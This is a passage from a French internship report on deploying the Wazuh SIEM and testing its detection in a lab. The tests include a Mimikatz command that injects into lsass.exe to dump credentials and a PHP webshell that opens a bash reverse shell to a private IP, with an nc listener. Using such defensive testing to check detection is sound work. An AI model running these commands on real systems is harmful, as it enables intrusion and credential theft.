Figure 10 : Connexion à l'adresse IP de serveur

Après la connection à cette IP cette interface sera ouverte comme montre la figure ci-
dessous :

Figure 11 : interface de Wazuh

17
Chapitre 3 Les tâches réalisées

3... Pour déployer les agents pour Windows et Parot on suivre ces étapes comme montre les
figure ci-dessous :

Figure 12 : première étape pour déployer un agent

Figure 13 : la deuxième étape pour déployer un agent

Après cette configuration en commençant tout d’abord par l’implémentation d’agent Wazuh
sur la machine Windows suivant ces étapes :

Choix de type d’OS pour l’agent Wazuh :

Figure 14 : déployer l'agent Windows

18
Chapitre 3 Les tâches réalisées

Après avoir déployer l’agent, il est nécessaire de copier la commande aperçu dans la figure
précedante dans l’invite de commande (CMD) de la machines Windows comme montre la
figure ci-dessous :

Figure 15 : Installation d’agent Windows

En terminant de configuration d’agent Windows, on passe à l’implémentation d’agent Linux

pour la machine Parot.

En commençant par déployer l’agent comme montre la figure ci-dessous:

Figure 16 : déployer l'agent linux

19
Chapitre 3 Les tâches réalisées

Après avoir déployer l’agent, il est nécessaire de copier la commande aperçu dans la figure
précedante dans le terminal de la machine Parot comme montre la figure ci-dessous:

Figure 17 : installation d'agent linux

Après avoir installé les deux agents Wazuh on arrive à voir cette interface que montre la
figure ci-dessous dans l’App Wazuh :

Figure 18 : Tableau de bord Wazuh

3.3 Collecter les logs Windows avec Wazuh :

Toutes sortes d'actions et d'événements sont capturées et enregistrés sur un système
d'exploitation Windows. Cela inclut les tentatives d'authentification, les connexions réseau, les
fichiers auxquels on a accédé et les comportements des applications et des services. Ces
informations sont stockées dans le journal des événements de Windows à l'aide d'un outil appelé
Sysmon.

Sysmon est un outil de surveillance et de journalisation des activités système pour les systèmes
d'exploitation Windows.

20
Chapitre 3 Les tâches réalisées

Il a été développé par Microsoft et peut être téléchargé gratuitement à partir du site Web de
Microsoft comme montre la figure ci-dessous :

Figure 19 : L'outil Sysmon

En commençant Pour donner des instructions à Sysmon, en exécutant l'application Sysmon et

fournir le fichier de configuration susmentionné comme montre la figure ci-dessous :

Figure 20 : configuration Sysmon

Dans un but de test, il est courant d'installer Mimikatz, un outil de post-exploitation significatif
qui permet l'extraction de mots de passe, de hachages, de codes PIN, et de tickets Kerberos à
partir de la mémoire.

Mimikatz est un outil open source bien connu de post-exploitation qui peut être utilisé pour
extraire des mots de passe en clair, des hachages et d'autres informations sensibles de la
mémoire des systèmes d'exploitation Windows. Il a été créé par le chercheur en sécurité français
Benjamin Delpy. Il présente des cas d'utilisation légitimes dans les tests de sécurité comme ce
cas et les tests de pénétration.

21
Chapitre 3 Les tâches réalisées

Après avoir exécuté le processus Mimikatz Il est possible d'essayer d'injecter un module dans
le processus lsass.exe du système Windows en utilisant la commande "lsadump::lsa//inject".
Le processus lsass.exe est responsable de l'authentification et de la gestion des sessions
d'utilisateurs, ainsi que de la gestion des mots de passe et des clés de chiffrement sur les
systèmes Windows. L'exécution de cette commande peut être associée à une attaque
malveillante visant à extraire les informations d'identification des utilisateurs.

Figure 21 : Injection d'un module dans le processus Lsass.exe

Afin de permettre à Wazuh de détecter les alertes liées à l'utilisation de Mimikatz, il est
nécessaire de créer une règle spécifique pour le serveur, qui sera en mesure d'analyser les
activités suspectes et d'émettre des alertes en temps réel en cas de détection d'un comportement
malveillant.

Cette règle se présente comme suit :

Figure 22 : Règle de détection

Maintenant Il est nécessaire de configurer l'agent Wazuh sur le serveur Windows pour qu'il
envoie les événements au serveur de gestion Wazuh. À cette fin, il convient d'ouvrir le fichier

22
Chapitre 3 Les tâches réalisées

de l'agent Wazuh situé à dans le dossier : C:\Program Files (x86)\ossec-agent\ossec.conf

pour inclure l’extrait suivant :

Figure 23 : Configuration Ossec

Il est nécessaire maintenant de redémarrer l'agent afin d'appliquer les changements. Et suite à
l'extraction d'informations par Mimikatz, les alertes détectées peuvent être observées en ouvrant
le tableau de bord Kibana.

Ils se présentent comme suit :

Figure 24 : tableau de bord Kibana (logs Windows)

Dans cette interface, deux éléments importants sont fournis : les techniques utilisées et les
descriptions associées aux alertes. Ces informations peuvent être utilisées par les analystes de

23
Chapitre 3 Les tâches réalisées

sécurité pour comprendre les types d'activités malveillantes qui ont été détectées et pour prendre
des mesures pour améliorer la posture de sécurité.

Parlant des techniques T1078 et T1055 sont deux techniques d'attaque répertoriées dans la
matrice MITRE ATT&CK (Adversarial Tactics, Techniques & Common Knowledge).

T1055 : est intitulée "Process Injection" et se réfère à l'insertion d'un code malveillant dans un
processus en cours d'exécution sur un système cible.

T1078 : est intitulée "Valid Accounts" et se réfère à l'utilisation d'identifiants d'accès valides,
tels que des noms d'utilisateur et des mots de passe volés ou compromis, pour accéder à des
systèmes et des réseaux cibles.

3.4 Collecter les logs Linux avec Wazuh :

La capture des logs d'un agent Linux peut être réalisée de manière simple et similaire
à la capture des événements d'un agent Windows. Le service de collecte de logs de Wazuh peut
être utilisé pour créer une entrée sur l'agent et indiquer quels logs doivent être envoyés au
serveur de gestion Wazuh.

Wazuh est livré avec de nombreuses règles qui lui permettent d'analyser les fichiers de log et
se trouvent dans /var/ossec/ruleset/rules et pour commencer il faut ajouter les règles de linux
dans ce fichier pour permettre à Wazuh d'analyser les fichiers journaux comme montre la figure
ci-dessous :

Figure 25: ajouter des règles pour Linux

Cette règle est utilisée pour analyser les logs à la recherche de messages d'avertissement et
d'erreur. Dans ce cas, cela devra être inséré dans l'agent de Wazuh qui envoie les logs, et ajouté
au fichier de configuration des serveurs de gestion de Wazuh situé dans
/var/ossec/etc/ossec.conf

24
Chapitre 3 Les tâches réalisées

dans cette cas on a utilisé le module de collecte Audit comme montre la figure ci-dessous:

Figure 26 : configuration transfert des logs Linux au serveur wazuh

Une fois le module de collecte d'audit sélectionné, il est nécessaire d'éditer les règles de
détection des webshells créés plus tard en ajoutant la règle suivante dans le fichier
/etc/audit/rules.d/audit.rules comme montre la figure ci-dessous:

Figure 27 : configuration des règles audit

25
Chapitre 3 Les tâches réalisées

Il est nécessaire de configurer l'agent Wazuh pour que le fichier de log généré par audit soit
détecté comme suit :

Figure 28 : Configuration d’agent pour collecter les logs collectés par audit

 Création du webshell :

Contexte : Dans le but de tester la capacité de Wazuh à collecter les logs de Linux, il est
envisageable de créer un webshell pour Apache, ce qui permet à un attaquant de prendre le
contrôle d'un serveur web Apache compromis et de l'utiliser pour exécuter des commandes
malveillantes. Diverses techniques existent pour créer des webshells pour Apache, dont
l'injection de code malveillant dans des fichiers de configuration Apache, technique que nous
utiliserons dans ce cas.

Pour commencer, il est possible d'exécuter la commande "sudo apachectl -S" pour obtenir la
configuration du VirtualHost, comme illustré dans la figure ci-dessous :

Figure 29 : exécution commande apache

En effet apache est un serveur web open-source largement utilisé dans le monde entier pour
héberger des sites web et des applications en ligne. L’exécution de la commande afficher dans
la capture si dessus permet au attaquant de connaitre l’adresse IP associés à ce serveur web et
le port dont il est connecté.

L'attaque reverseshell est généralement initiée par la création d'un fichier webshell contenant
un script PHP, permettant ainsi l'exécution de commandes sur le serveur eb.

26
Chapitre 3 Les tâches réalisées

La capture ci-dessous contient la commande à exécuter :

Figure 30 : Création webshell fichier php

Ensuite un reverseShell est créé comme montre la figure ci-dessous :

Figure 31: Création d'un reverseShell

La commande "echo -e "<php exec('/bin/bash -c "bash -i >& /dev/tcp/192.168.113.32/4444

0>&1"');?>" est utilisée pour insérer une commande d'exécution de shell dans le script php. La
commande d'exécution de shell est "exec('/bin/bash -c "bash -i >&
/dev/tcp/192.168.113.32/4444 0>&1"')". Cette commande ouvre un shell interactif en se
connectant à l'adresse IP 192.168.113.32 sur le port 4444, qui doit être configuré pour écouter
les connexions.

Maintenant l’exécution de ce reverseShell doit être mise en place en exécutant le script

localement en y accédant par le navigateur web en utilisant l'url montré ci-dessous :

Figure 32: Exécution de script localement

Après avoir exécuter le script, un "listener" a été ajouté sur le port 4444 à l'aide de la commande
"nc -lnvp 4444", permettant ainsi d'obtenir un shell pour l'utilisateur ww-data comme montre
les deux figures ci-dessus :

Figure 33 : ajout d'un" Listener"

27
Chapitre 3 Les tâches réalisées

Figure 34 : l'acquisition du Shell

La commande "nc -lnvp 4444" est utilisée pour écouter sur le port 4444 en utilisant le protocole
TCP. En effet cette commande a été utilisée en conjonction avec le payload de reverse Shell
pour établir une session de commande et contrôle à distance sur le système cible.

Enfin, un examen est effectué sur le tableau de bord Kibana de Wazuh pour déterminer si les
logs ont été détectés ou non, et les résultats sont présentés comme suit :

Figure 35: les alertes collectées

Comme il est donné si dessus Wazuh a détecté tous les alertes en précisant les techniques
utilisées qui sont :

T1105 : Il s'agit de la technique d'attaque "Transfert d'outils d'intrusion", qui est répertoriée
dans la matrice MITRE. Les attaquants peuvent utiliser cette technique pour transférer des outils
ou d'autres fichiers depuis un système externe vers un environnement compromis. Pour cela, ils
peuvent copier ces outils ou fichiers d'un système externe contrôlé par l'attaquant vers le réseau
de la victime, soit par le canal de commande et de contrôle, soit par des protocoles alternatifs.

T1505.003 : il s’agit une technique d'attaque appelée "backdoor de serveurs web avec des
webshells" (Backdoor Web Servers with Web Shells), répertoriée dans la matrice MITRE. Les

28
Chapitre 3 Les tâches réalisées

adversaires peuvent utiliser cette technique pour établir un accès persistant aux systèmes en
installant des webshells sur des serveurs web cibles.

4 Conclusion :
Dans ce chapitre, il a été démontré comment collecter les journaux de Linux et de
Windows, permettant ainsi d'obtenir des informations précieuses pour la gestion et la sécurité
des systèmes informatiques. Cette méthode de collecte de données peut être utilisée de manière
efficace et efficiente par les professionnels de la sécurité informatique et les administrateurs
système afin de maintenir la stabilité et la fiabilité des environnements informatiques.

29
 Conclusion Générale

Pour conclure cette expérience de stage au sein de DefensyLab a été très

enrichissante en termes de découverte du fonctionnement des systèmes de gestion des
informations et des événements de sécurité (SIEM) ainsi que de la solution open source Wazuh
dans le domaine de la Cybersecurity des systèmes d'information. Les objectifs principaux de ce
stage étaient la familiarisation avec le SIEM et la solution Wazuh, ainsi que la compréhension
de leur utilisation dans la détection proactive des menaces de sécurité. À travers cette
expérience, une connaissance approfondie de Wazuh, de ses fonctionnalités clés, et des
différentes étapes de mise en œuvre de cette solution dans un environnement de Cybersecurity
ont été acquises.

Cependant, il convient de souligner que ce travail présente certaines limites, notamment le fait
qu'il se limite à l'étude de la solution Wazuh dans un environnement de test et non dans un
environnement de production réel. En outre, d'autres solutions SIEM pourraient également être
examinées pour une comparaison plus approfondie.

Enfin, les perspectives du travail effectué sont prometteuses, car les solutions SIEM, et en
particulier Wazuh, sont de plus en plus utilisées dans les environnements de Cybersecurity. Les
connaissances acquises lors de ce stage pourraient être très utiles dans le parcours professionnel
futur de l'étudiant, étant donné l'importance croissante de la Cybersecurity pour les entreprises.

30
 Webographie

[1] : https://www.logpoint.com/fr/comprendre/c-est-quoi-le-
siem/

[2] [3] [4] : https://www.elastic.co/fr/what-is/elk-stack

[6] : https://www.fireeye.fr/products/helix/what-is-siem-and-
how-does-it-work.html

[7] : https://www.itweapons.com/fr/security-information-and-
event-management-siem/